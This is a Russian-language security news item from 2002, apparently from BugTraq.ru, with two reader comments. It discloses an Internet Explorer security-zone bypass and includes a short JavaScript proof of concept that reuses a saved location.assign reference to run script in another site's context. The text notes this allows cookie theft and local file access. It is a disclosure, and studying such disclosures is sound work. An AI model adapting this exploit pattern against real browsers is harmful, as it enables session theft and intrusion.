BugTraq.Ru
Русский BugTraq
http://www.bugtraq.ru/rsn/archive/2002/10/6.html

Обход зон безопасности в IE
dl // 03.10.02 02:32
Сохранение ссылки на NewWindow.location.assign, где NewWindow - окно, созданное скриптом, позволяет выполнить произвольный скрипт в любой зоне безопасности:

function f(){}
w=window.open("nothing.htm","_blank","height=150 width=150 left=0 top=0");
f=w.location.assign;
w.location.href="http://www.yahoo.com";
alert("wait for the page");
f("javascript:alert(document.body.innerHTML)");

Первой строчкой открываем окно с локальным файлом (возможно, и несуществующим), сохраняем ссылку н аэто окно, далее, открыв в нем страницу из другой зоны, вызываем код в ее контексте.
[Не забывайте при копировании материала указывать полный адрес источника: http://www.bugtraq.ru/rsn/archive/2002/10/6.html]

Помимо кражи кук пользователя с произвольных сайтов, это дает возможность получить доступ к локальным файлам - см. пример 2.

Источник: пример 1, пример 2      
теги: yahoo  |  предложить новость  |  обсудить  |  все отзывы (2) [4458]
назад «  » вперед

аналогичные материалы
Shellshock успешно использовали в атаке на Yahoo // 06.10.14 23:38
Twitter подтвердил "взлом" // 01.05.09 11:48
ICQ: пора валить? // 22.01.09 16:27
Microsoft пообещала блокировать уязвимые ActiveX по запросу производителей // 10.04.08 01:29
Апрельские обновления от MS // 09.04.08 01:56
Microsoft покупает Yahoo за $44,6 млрд // 01.02.08 16:05
Не стоит слишком доверять тулбарам FireFox // 31.05.07 18:02
 
последние новости
The Great Suspender предположительно превратился во вредоноса // 05.02.21 00:47
Десятилетняя уязвимость в sudo // 27.01.21 12:25
Блокировка Flash поломала китайскую железную дорогу // 24.01.21 22:17
Анализ SolarWinds-атаки от Microsoft // 21.01.21 20:50
С наступающим // 31.12.20 23:59
Apple, Google, Microsoft и Mozilla забанили казахстанский сертификат // 19.12.20 03:13
Cloudflare, Apple и Fastly предложили новый DNS-протокол // 09.12.20 05:10

Комментарии:

Обход зон безопасности в IE 05.10.02 02:26  
Автор: RedAndr UfaTeam <Андрей Рыжков> Статус: Member
<"чистая" ссылка>
Помимо кражи кук пользователя с произвольных сайтов, это
> дает возможность получить доступ к локальным файлам - см.
> пример 2.
У меня AVP второй пример зарубил :)
Обход зон безопасности в IE 07.10.02 22:57  
Автор: Digital_Scream Статус: Незарегистрированный пользователь
<"чистая" ссылка>
Как на меня ничего особенного. Обход зон безопасности в IE сталь обычным делом. Есть способы на любой вкус, а это еще один :)
<добавить комментарий>



  Copyright © 2001-2021 Dmitry Leonov Design: Vadim Derkach